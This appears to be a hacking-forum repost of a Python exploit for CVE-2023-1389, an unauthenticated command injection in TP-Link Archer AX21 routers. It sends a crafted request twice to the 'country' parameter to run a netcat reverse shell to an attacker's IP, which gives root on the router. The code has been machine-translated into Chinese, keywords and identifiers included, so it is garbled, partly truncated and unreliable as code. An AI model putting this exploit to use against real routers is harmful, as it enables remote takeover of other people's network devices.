H

TP -Link Archer AX21-未经验证的命令注入

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#!/usr/bin/python3

#利用标题: TP -Link Archer AX21-未经身份验证的命令注入
#日期: 07/25/2023
#漏洞作者: Voyag3r(https://github.com/voyag3r-security)
#供应商homepage3360 https://www.tp-link.com/us/
#版本: TP-Link Archer AX21(AX1800)固件1.1.4构建20230219(3https://wwwww.tenable.com/cve/cve/cve-2023-1389)
#测试ON:固件版本2.1.5构建20211231 Rel.73898(5553);硬件版Archer AX21 v2.0
#CVE: CVE-2023-1389

#免责:此脚本仅用于教育目的。
#请勿对任何您无权测试的系统运行此操作。
#作者对此造成的任何用途或损害将不承担任何责任
# 程序。

#CVE-2023-1389是网络中未经验证的命令注入漏洞
#TP-Link Archer AX21(AX1800)的管理接口,特别是在
乡村 乡村的回调
#'/cgi-bin/luci/; stok=/locale'端点。通过修改国家参数是
#可以将命令作为root运行。执行需要两次发送请求;
#第一个请求在* country * value中设置命令,第二个请求将命令设置
#(可以识别)执行它。

#此脚本是获得反向外壳的简短概念证明。阅读更多
#关于此脚本的开发,您可以在此处阅读博客文章:
https://medium.com/@voyag3r-securit...-RCE-in-tp-link-archer-axer-ax21-d7a60f259E94
#在运行脚本之前,请在您的首选端口上启动NC侦听器- 运行脚本- 利润
导入请求,urllib.parse,argparse
从requests.packages.urllib3.ceptions导入InsecureRequestWarning
#压制警告,以通过自签名证书连接到路由器
requests.packages.urllib3.disable_warnings(insecurreequestwarning)
#获取路由器IP的用户输入以及攻击者IP和端口
Parser=argparse.argumentparser()
parser.add_argument(' - r',' - router',dest='路由器',默认='192.168.0.1',help='路由器名称')
parser.add_argument(' - a'',' - attacker',dest='tacterer',默认='127.0.0.1',help='tactioner ip')
parser.add_argument(' - p',' - port',dest='port',默认='9999',help='local port')
args=parser.parse_args()
#使用攻击者IP和端口生成反向外壳命令
RevShell=Urllib.Parse.Quote('rm/tmp/f; mkfifo/tmp/f; cat/tmp/f |/bin/sh -i 21 | nc' + args.AttaCker +'
#url获得反向外壳
url_command='https://' + args.router +'/cgi-bin/luci/; stok=/locale=/locale?form=younderoperation=writecountry=$(' + revshell +')''
#将URL发送两次以运行命令。攻击需要两次发送
r=requests.get(url_command,verify=false)
r=requests.get(url_command,verify=false)
 
后退
顶部